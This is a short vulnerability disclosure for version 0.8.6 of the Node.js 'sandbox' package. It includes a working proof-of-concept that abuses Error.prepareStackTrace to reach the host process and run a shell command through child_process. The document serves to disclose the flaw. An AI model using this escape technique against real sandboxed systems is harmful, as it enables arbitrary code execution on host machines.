Sandbox Escape Bug

[seongil-wi]

• Sandbox version: 0.8.6
• Node version: 18.15.0

var Sandbox = require("sandbox")
var code = `
Error.prepareStackTrace = (_, c) => c[0].getThis();
const ret = Error().stack;
ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
`

s = new Sandbox()
s.run(code)

Affected versions of this package are vulnerable to remote code execution. Especially, the attacker is able to access to host error objects during the generation of a stack trace, which can lead to execution of arbitrary code on the host machine.